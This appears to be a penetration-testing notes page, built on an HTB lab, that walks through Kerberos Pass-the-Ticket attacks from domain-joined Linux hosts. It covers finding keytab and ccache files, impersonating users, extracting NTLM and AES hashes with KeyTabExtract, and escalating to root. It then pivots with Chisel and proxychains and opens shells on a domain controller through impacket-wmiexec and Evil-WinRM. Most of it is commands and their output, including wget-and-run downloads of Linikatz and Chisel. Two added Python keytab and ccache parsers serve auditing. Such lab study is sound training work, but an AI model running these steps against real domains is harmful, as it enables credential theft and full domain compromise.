# Pass the Ticket (PtT) - Linux

## Check If Linux Machine is Domain Joined

### **realm**

```shell-session
david@inlanefreight.htb@linux01:~$ realm list

inlanefreight.htb
  type: kerberos
  realm-name: INLANEFREIGHT.HTB
  domain-name: inlanefreight.htb
  configured: kerberos-member
  server-software: active-directory
  client-software: sssd
  required-package: sssd-tools
  required-package: sssd
  required-package: libnss-sss
  required-package: libpam-sss
  required-package: adcli
  required-package: samba-common-bin
  login-formats: %U@inlanefreight.htb
  login-policy: allow-permitted-logins
  permitted-logins: david@inlanefreight.htb, julio@inlanefreight.htb
  permitted-groups: Linux Admins
```

### **PS**

```shell-session
$ ps -ef | grep -i "winbind\|sssd"

root        2140       1  0 Sep29 ?        00:00:01 /usr/sbin/sssd -i --logger=files
root        2141    2140  0 Sep29 ?        00:00:08 /usr/libexec/sssd/sssd_be --domain inlanefreight.htb --uid 0 --gid 0 --logger=files
root        2142    2140  0 Sep29 ?        00:00:03 /usr/libexec/sssd/sssd_nss --uid 0 --gid 0 --logger=files
root        2143    2140  0 Sep29 ?        00:00:03 /usr/libexec/sssd/sssd_pam --uid 0 --gid 0 --logger=files
```

## Finding Kerberos Tickets in Linux

### **Using Find to Search for Files with Keytab in the Name**

```shell-session
$ find / -name "*keytab*" -ls 2>/dev/null

<SNIP>

   131610      4 -rw-------   1 root     root         1348 Oct  4 16:26 /etc/krb5.keytab
   262169      4 -rw-rw-rw-   1 root     root          216 Oct 12 15:13 /opt/specialfiles/carlos.keytab
```

To use a keytab file, we must have read and write (rw) privileges on the file.
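As an added example (mine, not code from the page or from HTB), the Python below is the defender's counterpart to the `find` above: for a path from that listing it confirms the MIT keytab magic, lists principal, KVNO and enctype the way `klist -k -t` does without ever reading key bytes, and flags permissions like the `rw-rw-rw-` on `carlos.keytab`. The keytab it writes in `demo()` and the temp path are constructed so it runs offline.

```python
import os, stat, struct, tempfile

# Added example (not from the page): the defender's counterpart to the `find` above.
# For a path it checks the MIT keytab magic (0x0502), lists principal/KVNO/enctype as
# `klist -k -t` does (key bytes are skipped, never read) and flags loose permissions.

def _cstr(buf, off):                      # 16-bit big-endian length, then bytes
    n = struct.unpack_from(">H", buf, off)[0]
    return buf[off + 2:off + 2 + n], off + 2 + n

def keytab_entries(buf):
    """Return [(principal, kvno, enctype), ...]; [] when buf is not a 0x0502 keytab."""
    if buf[:2] != b"\x05\x02":
        return []
    out, off = [], 2
    while off + 4 <= len(buf):
        size = struct.unpack_from(">i", buf, off)[0]
        off, end = off + 4, off + 4 + abs(size)
        if size > 0:                      # a negative size marks a deleted slot
            ncomp = struct.unpack_from(">H", buf, off)[0]
            realm, p = _cstr(buf, off + 2)
            comps = []
            for _ in range(ncomp):
                c, p = _cstr(buf, p)
                comps.append(c.decode())
            vno8, enctype = buf[p + 8], struct.unpack_from(">H", buf, p + 9)[0]
            _, p = _cstr(buf, p + 11)     # key: length consumed, bytes untouched
            kvno = struct.unpack_from(">I", buf, p)[0] if end - p >= 4 else vno8
            out.append(("/".join(comps) + "@" + realm.decode(), kvno, enctype))
        off = end
    return out

def audit_keytab(path):
    """Return finding strings for one file; an empty list means nothing to report."""
    st = os.stat(path)
    entries = keytab_entries(open(path, "rb").read())
    if not entries: return []             # not a keytab (or empty): nothing to say
    checks = [
        (st.st_mode & (stat.S_IRGRP | stat.S_IROTH),
         "readable by group/others; holds keys for " + ", ".join(p for p, _, _ in entries)),
        (st.st_mode & stat.S_IWOTH, "world-writable: stored keys could be replaced"),
    ]
    return [msg for cond, msg in checks if cond]

def build_keytab(principal, kvno, enctype, key):   # constructed one-entry keytab
    user, realm = (s.encode() for s in principal.split("@"))
    body = struct.pack(">HH", 1, len(realm)) + realm + struct.pack(">H", len(user)) + user
    body += struct.pack(">IIBHH", 1, 1665076153, kvno & 0xFF, enctype, len(key)) + key
    return b"\x05\x02" + struct.pack(">i", len(body) + 4) + body + struct.pack(">I", kvno)

def demo():                               # constructed carlos.keytab at mode 0666, audited
    path = os.path.join(tempfile.mkdtemp(), "carlos.keytab")
    with open(path, "wb") as f: f.write(build_keytab("carlos@INLANEFREIGHT.HTB", 1, 23, b"\x00" * 16))
    os.chmod(path, 0o666)
    return audit_keytab(path)
```

Feed `audit_keytab` the paths from `find / -name "*keytab*"` to get the same two findings the listing above implies for `/opt/specialfiles/carlos.keytab` and none for a root-only `/etc/krb5.keytab`.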

### **Identifying Keytab Files in Cronjobs**

```shell-session
$ crontab -l

# Edit this file to introduce tasks to be run by cron.
# 
<SNIP>
# 
# m h  dom mon dow   command
*/5 * * * * /home/carlos@inlanefreight.htb/.scripts/kerberos_script_test.sh

$ cat /home/carlos@inlanefreight.htb/.scripts/kerberos_script_test.sh
#!/bin/bash

kinit svc_workstations@INLANEFREIGHT.HTB -k -t /home/carlos@inlanefreight.htb/.scripts/svc_workstations.kt
smbclient //dc01.inlanefreight.htb/svc_workstations -c 'ls'  -k -no-pass > /home/carlos@inlanefreight.htb/script-test-results.txt
```

## Finding ccache Files

### **Reviewing Environment Variables for ccache Files**

```shell-session
$ env | grep -i krb5

KRB5CCNAME=FILE:/tmp/krb5cc_647402606_qd2Pfh
```

### **Searching for ccache Files in /tmp**

```shell-session
$ ls -la /tmp

total 68
drwxrwxrwt 13 root                     root                           4096 Oct  6 16:38 .
drwxr-xr-x 20 root                     root                           4096 Oct  6  2021 ..
-rw-------  1 julio@inlanefreight.htb  domain users@inlanefreight.htb 1406 Oct  6 16:38 krb5cc_647401106_tBswau
-rw-------  1 david@inlanefreight.htb  domain users@inlanefreight.htb 1406 Oct  6 15:23 krb5cc_647401107_Gf415d
-rw-------  1 carlos@inlanefreight.htb domain users@inlanefreight.htb 1433 Oct  6 15:43 krb5cc_647402606_qd2Pfh
```

## Abusing KeyTab Files

### **Listing keytab File Information**

```shell-session
$ klist -k -t /opt/specialfiles/carlos.keytab

Keytab name: FILE:/opt/specialfiles/carlos.keytab
KVNO Timestamp           Principal
---- ------------------- ------------------------------------------------------
   1 10/06/2022 17:09:13 carlos@INLANEFREIGHT.HTB
```

If `klist` is not found, install the MIT Kerberos client tools: `sudo apt-get install krb5-user`.

### **Impersonating a User with a keytab**

```shell-session
$ klist 

Ticket cache: FILE:/tmp/krb5cc_647401107_r5qiuu
Default principal: david@INLANEFREIGHT.HTB

Valid starting     Expires            Service principal
10/06/22 17:02:11  10/07/22 03:02:11  krbtgt/INLANEFREIGHT.HTB@INLANEFREIGHT.HTB
        renew until 10/07/22 17:02:11

$ kinit carlos@INLANEFREIGHT.HTB -k -t /opt/specialfiles/carlos.keytab

$ klist 
Ticket cache: FILE:/tmp/krb5cc_647401107_r5qiuu
Default principal: carlos@INLANEFREIGHT.HTB

Valid starting     Expires            Service principal
10/06/22 17:16:11  10/07/22 03:16:11  krbtgt/INLANEFREIGHT.HTB@INLANEFREIGHT.HTB
        renew until 10/07/22 17:16:11
```

### **Connecting to SMB Share as another user**

```shell-session
$ smbclient //dc01/carlos -k -c ls

  .                                   D        0  Thu Oct  6 14:46:26 2022
  ..                                  D        0  Thu Oct  6 14:46:26 2022
  carlos.txt                          A       15  Thu Oct  6 14:46:54 2022

                7706623 blocks of size 4096. 4452852 blocks available
```

### Keytab Extract

{% embed url="<https://github.com/sosdave/KeyTabExtract>" %}

We were able to impersonate Carlos using the account's tickets to read a shared folder in the domain, but if we want to gain access to his account on the Linux machine, we'll need his password.

We can attempt to crack the account's password by extracting the hashes from the keytab file. Let's use [KeyTabExtract](https://github.com/sosdave/KeyTabExtract), a tool to extract valuable information from 502-type .keytab files, which may be used to authenticate Linux boxes to Kerberos.

#### **1. Extracting Keytab Hashes with KeyTabExtract**

```shell-session
$ python3 /opt/keytabextract.py /opt/specialfiles/carlos.keytab 

[*] RC4-HMAC Encryption detected. Will attempt to extract NTLM hash.
[*] AES256-CTS-HMAC-SHA1 key found. Will attempt hash extraction.
[*] AES128-CTS-HMAC-SHA1 hash discovered. Will attempt hash extraction.
[+] Keytab File successfully imported.
        REALM : INLANEFREIGHT.HTB
        SERVICE PRINCIPAL : carlos/
        NTLM HASH : a738f92b3c08b424ec2d99589a9cce60
        AES-256 HASH : 42ff0baa586963d9010584eb9590595e8cd47c489e25e82aae69b1de2943007f
        AES-128 HASH : fa74d5abf4061baa1d4ff8485d1261c4
```

With the NTLM hash, we can perform a [Pass the Hash (PtH) attack](/0xss0rz/pentest/post-exploitation/lateral-movement/pass-the-hash-pth.md). With the AES256 or AES128 hash, we can forge our tickets using [Rubeus](/0xss0rz/pentest/tools/rubeus.md) or attempt to [crack the hashes](/0xss0rz/pentest/cracking/hashes.md) to obtain the plaintext password.

{% embed url="<https://crackstation.net/>" %}

{% embed url="<https://ntlm.pw/>" %}

#### **2. Log in as Carlos**

```shell-session
$ su - carlos@inlanefreight.htb

Password: 
$ klist 
Ticket cache: FILE:/tmp/krb5cc_647402606_ZX6KFA
Default principal: carlos@INLANEFREIGHT.HTB

Valid starting       Expires              Service principal
10/07/2022 11:01:13  10/07/2022 21:01:13  krbtgt/INLANEFREIGHT.HTB@INLANEFREIGHT.HTB
        renew until 10/08/2022 11:01:13
```

## Abusing Keytab ccache

To abuse a ccache file, all we need is read privileges on the file. These files, located in `/tmp`, can only be read by the user who created them, but if we gain root access, we could use them.

## **Privilege Escalation to Root**

{% content-ref url="/pages/37xjPkedNQqNbSue9Xs9" %}
[Privilege Escalation](/0xss0rz/pentest/privilege-escalation.md)
{% endcontent-ref %}

```shell-session
$ ssh svc_workstations@inlanefreight.htb@10.129.204.23 -p 2222
                  
svc_workstations@inlanefreight.htb@10.129.204.23's password: 
Welcome to Ubuntu 20.04.5 LTS (GNU/Linux 5.4.0-126-generic x86_64)          
...SNIP...

svc_workstations@inlanefreight.htb@linux01:~$ sudo -l
[sudo] password for svc_workstations@inlanefreight.htb: 
Matching Defaults entries for svc_workstations@inlanefreight.htb on linux01:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User svc_workstations@inlanefreight.htb may run the following commands on linux01:
    (ALL) ALL
svc_workstations@inlanefreight.htb@linux01:~$ sudo su
root@linux01:/home/svc_workstations@inlanefreight.htb# whoami
root
```

### **Looking for ccache Files**

```shell-session
ls -la /tmp

total 76
drwxrwxrwt 13 root                               root                           4096 Oct  7 11:35 .
drwxr-xr-x 20 root                               root                           4096 Oct  6  2021 ..
-rw-------  1 julio@inlanefreight.htb            domain users@inlanefreight.htb 1406 Oct  7 11:35 krb5cc_647401106_HRJDux
-rw-------  1 julio@inlanefreight.htb            domain users@inlanefreight.htb 1406 Oct  7 11:35 krb5cc_647401106_qMKxc6
-rw-------  1 david@inlanefreight.htb            domain users@inlanefreight.htb 1406 Oct  7 10:43 krb5cc_647401107_O0oUWh
-rw-------  1 svc_workstations@inlanefreight.htb domain users@inlanefreight.htb 1535 Oct  7 11:21 krb5cc_647401109_D7gVZF
-rw-------  1 carlos@inlanefreight.htb           domain users@inlanefreight.htb 3175 Oct  7 11:35 krb5cc_647402606
-rw-------  1 carlos@inlanefreight.htb           domain users@inlanefreight.htb 1433 Oct  7 11:01 krb5cc_647402606_ZX6KFA
```

### **Identifying Group Membership with the id Command**

```shell-session
# id julio@inlanefreight.htb

uid=647401106(julio@inlanefreight.htb) gid=647400513(domain users@inlanefreight.htb) groups=647400513(domain users@inlanefreight.htb),647400512(domain admins@inlanefreight.htb),647400572(denied rodc password replication group@inlanefreight.htb)
```

Julio is a member of the `Domain Admins` group.

### Use a ccache file

```shell-session
# echo "<base64_ccache>" | base64 -d > krb5cc.florence.ramirez
# export KRB5CCNAME=krb5cc.florence.ramirez 
# nxc smb domain.htb -u florence.ramirez --use-kcache
SMB         10.10.11.24     445    DC01             [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:ghost.htb) (signing:True) (SMBv1:False)
SMB         10.10.11.24     445    DC01             [+] domain.htb\florence.ramirez from ccache
```

To use a ccache file, we can copy the ccache file and assign the file path to the `KRB5CCNAME` variable.

```shell-session
root@linux01:~# klist

klist: No credentials cache found (filename: /tmp/krb5cc_0)
root@linux01:~# cp /tmp/krb5cc_647401106_I8I133 .
root@linux01:~# export KRB5CCNAME=/root/krb5cc_647401106_I8I133
root@linux01:~# klist
Ticket cache: FILE:/root/krb5cc_647401106_I8I133
Default principal: julio@INLANEFREIGHT.HTB

Valid starting       Expires              Service principal
10/07/2022 13:25:01  10/07/2022 23:25:01  krbtgt/INLANEFREIGHT.HTB@INLANEFREIGHT.HTB
        renew until 10/08/2022 13:25:01
root@linux01:~# smbclient //dc01/C$ -k -c ls -no-pass
  $Recycle.Bin                      DHS        0  Wed Oct  6 17:31:14 2021
  Config.Msi                        DHS        0  Wed Oct  6 14:26:27 2021
  Documents and Settings          DHSrn        0  Wed Oct  6 20:38:04 2021
  john                                D        0  Mon Jul 18 13:19:50 2022
  julio                               D        0  Mon Jul 18 13:54:02 2022
  pagefile.sys                      AHS 738197504  Thu Oct  6 21:32:44 2022
  PerfLogs                            D        0  Fri Feb 25 16:20:48 2022
  Program Files                      DR        0  Wed Oct  6 20:50:50 2021
  Program Files (x86)                 D        0  Mon Jul 18 16:00:35 2022
  ProgramData                       DHn        0  Fri Aug 19 12:18:42 2022
  SharedFolder                        D        0  Thu Oct  6 14:46:20 2022
  System Volume Information         DHS        0  Wed Jul 13 19:01:52 2022
  tools                               D        0  Thu Sep 22 18:19:04 2022
  Users                              DR        0  Thu Oct  6 11:46:05 2022
  Windows                             D        0  Wed Oct  5 13:20:00 2022

                7706623 blocks of size 4096. 4447612 blocks available
```
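As an added example (mine, not from the page or the MIT krb5 project), this Python reader parses a ccache file of the kind listed in `/tmp` above and reports the default principal plus the client, service principal and expiry of each stored ticket, which is the triage an incident responder does on a copied cache without needing `klist`. `build_ccache` constructs a sample with a dummy session key and ticket so the code runs offline.

```python
import struct

# Added example (not from the page): reader for MIT credential cache (ccache) files, the
# FILE:/tmp/krb5cc_<uid>_<random> caches KRB5CCNAME points at. Gives the default principal
# and per ticket client, service principal, expiry (klist's view). Format: MIT ccache v4.

def _int(buf, off, fmt):                 # big-endian integer -> (value, new offset)
    return struct.unpack_from(fmt, buf, off)[0], off + struct.calcsize(fmt)
def _data(buf, off):                     # 32-bit length followed by that many bytes
    n, off = _int(buf, off, ">I")
    return buf[off:off + n], off + n

def _principal(buf, off):                # name_type, component count, realm, components
    _, off = _int(buf, off, ">I")
    n, off = _int(buf, off, ">I")
    realm, off = _data(buf, off)
    comps = []
    for _ in range(n):
        c, off = _data(buf, off)
        comps.append(c.decode())
    return "/".join(comps) + "@" + realm.decode(), off

def parse_ccache(buf):
    """Return (default_principal, [(client, server, endtime_epoch), ...])."""
    if buf[:2] != b"\x05\x04":
        raise ValueError("only ccache format version 4 is supported")
    hlen, off = _int(buf, 2, ">H")
    default, off = _principal(buf, off + hlen)       # header tags (time offset) skipped
    creds = []
    while off < len(buf):
        client, off = _principal(buf, off)
        server, off = _principal(buf, off)
        _, off = _data(buf, off + 2)                  # keyblock: enctype, session key
        end = struct.unpack_from(">IIII", buf, off)[2]  # authtime, starttime, endtime, renew_till
        off += 16 + 1 + 4                             # the four times, is_skey, ticket_flags
        for _ in range(2):                            # addresses, then authdata
            cnt, off = _int(buf, off, ">I")
            for _ in range(cnt):
                _, off = _data(buf, off + 2)          # 16-bit type, then data
        _, off = _data(buf, off)                      # ticket (ASN.1, left opaque)
        _, off = _data(buf, off)                      # second_ticket
        creds.append((client, server, end))
    return default, creds

_enc = lambda b: struct.pack(">I", len(b)) + b       # inverse of _data, for the sample
def _enc_principal(name):
    user, realm = name.split("@")
    return struct.pack(">II", 1, user.count("/") + 1) + _enc(realm.encode()) + b"".join(_enc(c.encode()) for c in user.split("/"))

def build_ccache(default, creds):        # constructed v4 cache: [(client, server, endtime)]
    out = b"\x05\x04\x00\x00" + _enc_principal(default)    # version 4, empty header
    for client, server, end in creds:
        out += _enc_principal(client) + _enc_principal(server)
        out += struct.pack(">H", 18) + _enc(b"\x00" * 32)   # aes256-cts enctype, dummy key
        out += struct.pack(">IIIIBI", end - 36000, end - 36000, end, end + 36000, 0, 0x40E10000)
        out += struct.pack(">II", 0, 0) + _enc(b"dummy-ticket") + _enc(b"")
    return out
```

Run `parse_ccache(open("/tmp/krb5cc_647401106_I8I133", "rb").read())` on a real cache to get the same principal and expiry that the `klist` output above shows; configuration entries (server names under `X-CACHECONF:`) are listed like any other credential.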

## Using Linux Attack Tools with Kerberos

In this scenario, our attack host doesn't have a connection to the `KDC/Domain Controller`, and we can't use the Domain Controller for name resolution. To use Kerberos, we need to proxy our traffic via `MS01` with a tool such as [Chisel](https://github.com/jpillora/chisel) and [Proxychains](https://github.com/haad/proxychains) and edit the `/etc/hosts` file to hardcode IP addresses of the domain and the machines we want to attack.

This is easier with Ligolo-ng:

{% content-ref url="/pages/vp8a38ukauPNVrWUQzpY" %}
[Pivot, Tunneling and Port Forwarding](/0xss0rz/pentest/post-exploitation/pivot-tunneling-and-port-forwarding.md)
{% endcontent-ref %}

### Transfer ccache file

#### **Host File Modified**

```shell-session
0xss0rz@htb[/htb]$ cat /etc/hosts

# Host addresses

172.16.1.10 inlanefreight.htb   inlanefreight   dc01.inlanefreight.htb  dc01
172.16.1.5  ms01.inlanefreight.htb  ms01
```

We need to modify our proxychains configuration file to use socks5 and port 1080.

#### **Proxychains Configuration File**

```shell-session
0xss0rz@htb[/htb]$ cat /etc/proxychains.conf

<SNIP>

[ProxyList]
socks5 127.0.0.1 1080
```

<https://github.com/jpillora/chisel>

#### **Download Chisel to our Attack Host**

```shell-session
0xss0rz@htb[/htb]$ wget https://github.com/jpillora/chisel/releases/download/v1.7.7/chisel_1.7.7_linux_amd64.gz
0xss0rz@htb[/htb]$ gzip -d chisel_1.7.7_linux_amd64.gz
0xss0rz@htb[/htb]$ mv chisel_* chisel && chmod +x ./chisel
0xss0rz@htb[/htb]$ sudo ./chisel server --reverse 

2022/10/10 07:26:15 server: Reverse tunneling enabled
2022/10/10 07:26:15 server: Fingerprint 58EulHjQXAOsBRpxk232323sdLHd0r3r2nrdVYoYeVM=
2022/10/10 07:26:15 server: Listening on http://0.0.0.0:8080
```

Connect to `MS01` via RDP and execute chisel (located in C:\Tools).

#### **Connect to MS01 with xfreerdp**

```shell-session
0xss0rz@htb[/htb]$ xfreerdp /v:10.129.204.23 /u:david /d:inlanefreight.htb /p:Password2 /dynamic-resolution
```

#### **Execute chisel from MS01**

```cmd-session
C:\htb> c:\tools\chisel.exe client 10.10.14.33:8080 R:socks

2022/10/10 06:34:19 client: Connecting to ws://10.10.14.33:8080
2022/10/10 06:34:20 client: Connected (Latency 125.6177ms)
```

Finally, we need to transfer Julio's ccache file from `LINUX01` and create the environment variable `KRB5CCNAME` with the value corresponding to the path of the ccache file.

### **Setting the KRB5CCNAME Environment Variable**

```shell-session
0xss0rz@htb[/htb]$ export KRB5CCNAME=/home/htb-student/krb5cc_647401106_I8I133
```

### Impacket

To use the Kerberos ticket, we need to specify our target machine name (not the IP address) and use the option `-k`. If we get a prompt for a password, we can also include the option `-no-pass`.

**Using Impacket with proxychains and Kerberos Authentication**

```shell-session
0xss0rz@htb[/htb]$ proxychains impacket-wmiexec dc01 -k

[proxychains] config file found: /etc/proxychains.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.14
Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation

[proxychains] Strict chain  ...  127.0.0.1:1080  ...  dc01:445  ...  OK
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  INLANEFREIGHT.HTB:88  ...  OK
[*] SMBv3.0 dialect used
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  dc01:135  ...  OK
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  INLANEFREIGHT.HTB:88  ...  OK
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  dc01:50713  ...  OK
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  INLANEFREIGHT.HTB:88  ...  OK
[!] Launching semi-interactive shell - Careful what you execute
[!] Press help for extra shell commands
C:\>whoami
inlanefreight\julio
```

### Evil-WinRM

{% content-ref url="/pages/5zE4duLRkawZtstWjbb7" %}
[Evil-WinRM](/0xss0rz/pentest/tools/evil-winrm.md)
{% endcontent-ref %}

**Using Evil-WinRM with Kerberos**

```shell-session
0xss0rz@htb[/htb]$ proxychains evil-winrm -i dc01 -r inlanefreight.htb

[proxychains] config file found: /etc/proxychains.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.14

Evil-WinRM shell v3.3

Warning: Remote path completions are disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine

Data: For more information, check Evil-WinRM Github: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint

[proxychains] Strict chain  ...  127.0.0.1:1080  ...  dc01:5985  ...  OK
*Evil-WinRM* PS C:\Users\julio\Documents> whoami ; hostname
inlanefreight\julio
DC01
```

## Miscellaneous

If we want to use a `ccache file` in Windows or a `kirbi file` in a Linux machine, we can use [impacket-ticketConverter](https://github.com/SecureAuthCorp/impacket/blob/master/examples/ticketConverter.py) to convert them. To use it, we specify the file we want to convert and the output filename. Let's convert Julio's ccache file to kirbi.

### **Impacket Ticket Converter**

{% embed url="<https://github.com/fortra/impacket/blob/master/examples/ticketConverter.py>" %}

Alternatively, `git clone https://github.com/zer1t0/ticket_converter.git` (see the Zephyr write-up).

```shell-session
0xss0rz@htb[/htb]$ impacket-ticketConverter krb5cc_647401106_I8I133 julio.kirbi

Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation

[*] converting ccache to kirbi...
[+] done
```

The reverse conversion works the same way: pass the `.kirbi` file as the first argument and the ccache output name as the second. Now let's use the `.kirbi` file in Windows.

### **Importing Converted Ticket into Windows Session with Rubeus**

```cmd-session
C:\htb> C:\tools\Rubeus.exe ptt /ticket:c:\tools\julio.kirbi
```

## Linikatz

{% embed url="<https://github.com/CiscoCXSecurity/linikatz>" %}

Just like `Mimikatz`, to take advantage of Linikatz, we need to be root on the machine. This tool will extract all credentials, including Kerberos tickets, from different Kerberos implementations such as FreeIPA, SSSD, Samba, Vintela, etc. Once it extracts the credentials, it places them in a folder whose name starts with `linikatz.`. Inside this folder, you will find the credentials in the different available formats, including ccache and keytabs.

```shell-session
$ wget -O /opt/linikatz.sh https://raw.githubusercontent.com/CiscoCXSecurity/linikatz/master/linikatz.sh
$ chmod +x /opt/linikatz.sh
$ /opt/linikatz.sh
```

### V2

{% embed url="<https://github.com/Orange-Cyberdefense/LinikatzV2>" %}

